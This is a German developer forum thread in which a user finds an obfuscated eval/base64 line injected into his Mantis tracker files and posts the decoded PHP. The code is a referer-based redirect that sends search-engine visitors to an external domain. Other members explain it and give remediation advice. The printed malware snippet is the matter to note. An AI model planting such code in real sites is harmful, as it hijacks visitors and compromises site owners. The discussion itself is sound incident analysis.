Delphi-PRAXiS
Seite 1 von 2  1 2      
40 Beiträge dieses Themas auf einer Seite anzeigen

Delphi-PRAXiS (https://www.delphipraxis.net/forum.php)
-   Programmieren allgemein (https://www.delphipraxis.net/40-programmieren-allgemein/)
-   -   PHP Virus ? (https://www.delphipraxis.net/187782-php-virus.html)

haentschman 3. Jan 2016 13:00
PHP Virus ?
 
Hallöle... :P

Beim Download der Config Datei meines Mantis wurde ein Virus gefunden... :roll: Hä... Wie jetzt? :evil:

In der ersten Zeile einiger (aller?) Dateien war das Muster:
Code:
eval(base64_decode("DQplcnJvcl9yZXBvcnR...l9DQp9DQp9"));
vorhanden.
Ein Decode ergibt folgenden Code:
Zitat:
<?php error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
$referer = $_SERVER['HTTP_REFERER'];
$uag = $_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "live.com") or stristr($referer, "webalta") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google\.(.*?)\/url\?sa/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com/l") or stristr($referer, "aol.com")) {
if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
header("Location: http://ibontu.25u.com/");
exit();
}
}
}
}
}
Was macht der Code genau?

Daniel 3. Jan 2016 13:02
AW: PHP Virus ?
 
Er leitet den Anwender um auf eine andere Website.
Irgendwer hatte wohl Schreibzugriff, der dazu nicht hätte befugt sein sollen.

//edit: Brich das bitte mal um.

haentschman 3. Jan 2016 13:28
AW: PHP Virus ?
 
Danke Daniel...

Hmm... ich habe die ganze Zeit mit dem Mantis gearbeitet. Wo anders bin ich nie rausgekommen... :gruebel:
Zitat:
Brich das bitte mal um.
Sorry... Beim Speichern hatte sich Avira logischerweise über einen Scriptvirus beschwert. Danach hatte ich das Script eingekürzt. Beim erneuten Speichern hat er dann doch das Ganze übertragen.
...erledigt. :P

Daniel 3. Jan 2016 13:32
AW: PHP Virus ?
 
Er prüft vorher ein paar Bedingungen ab, so z.B. die Kennung des Browsers sowie die verweisende Webseite.
Die Umleitung wird nur aktiv, wenn Du nicht den IE in Version 6 oder 7 nutzt und von einer der o.g. Suchmaschinen kommst.

Der Webserver hat augenscheinlich ein gravierendes Sicherheitsproblem, da es wenigstens einen Weg gab oder immernoch gibt, Dateien zu verändern.

vagtler 3. Jan 2016 13:41
AW: PHP Virus ?
 
Der entsprechende Server ist kompromittiert. Wenn Du nicht genau nachvollziehen kannst, was dort wann passiert ist, würde ich den Server vollständig neu aufsetzen. Dabei sollte für alle dort betriebenen Dienste auf Datensicherungen vor dem erfolgreichen Angriff zurückgegriffen werden.

haentschman 3. Jan 2016 13:53
AW: PHP Virus ?
 
Das ist der Webspace bei 1und1 welche mir nach dem Hochladen einer verseuchten Datei sofort meinen FTP Zugang zugemacht haben und der Virus erkannt wurde. Erstaunlich das das im laufenden Bertieb nicht aufgefallen ist. Die sind da eigentlich kurz angebunden... :thumb:

Nachtrag:
Vor Jahren hatte ich mal einen Angriff der auch durchgekommen war und von 1und1 protokolliert wurde. Die von mir manuell kontrollierten Dateien trugen den Code und Änderung März 2013. Kann gut sein das das noch übrig geblieben ist.

So wie es aussieht war nur der Mantis Ordner betroffen. Alles ohne Ausnahme entsorgt und neu instaliert. Nächste Woche mache ich wieder Kontrolle.

vagtler 3. Jan 2016 14:14
AW: PHP Virus ?
 
Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.

borncrush 3. Jan 2016 14:16
AW: PHP Virus ?
 
Falls Du kein Backup einspielen kannst, denke bitte daran, umgehend alle Kennwörter zu ändern und unnötige Konten zu deaktivieren.

haentschman 3. Jan 2016 14:24
AW: PHP Virus ?
 
Danke an Alle...:P

Ich denke das sind Reste von dem alten Angriff. Der FTP Log zeigt 2 Monate rückwirkend keinen Zugriff außer von mir selbst.
Zitat:
Falls Du kein Backup einspielen kannst, denke bitte daran, umgehend alle Kennwörter zu ändern und unnötige Konten zu deaktivieren.
...ich habe den Mantis komplett neu aufgesetzt. Kennwörter sind verschärft. 8-)
Zitat:
Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.
Meinst du die von 1und1 haben keine Ahnung?

vagtler 3. Jan 2016 14:35
AW: PHP Virus ?
 
Zitat:
Zitat von haentschman (Beitrag 1325909)
[...]
Zitat:
Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.
Meinst du die von 1und1 haben keine Ahnung?
Mal abgesehen davon, dass es sich bei den 1&1 Webservern um ein reines Webhosting und kein Managed Server Angebot handelt und daher der Betrieb von geschäftskritischen Applikationen darauf sich eigentlich schon per se verbietet, wollte ich die Kompetenz der 1&1-Mitarbeiter nicht in Frage stellen.

Aber in heutigen Zeiten einen nicht getunnelten FTP-Zugriff ohne weitere Sicherheitsmaßnahmen überhaupt nur anzubieten genügt auch geringsten Sicherheitsanforderungen selbst im privaten Bereich kaum noch - schließlich wird Dein Passwort unverschlüsselt über das Internet übertragen.


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:50 Uhr.
Seite 1 von 2  1 2      
40 Beiträge dieses Themas auf einer Seite anzeigen

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024-2025 by Thomas Breitkreuz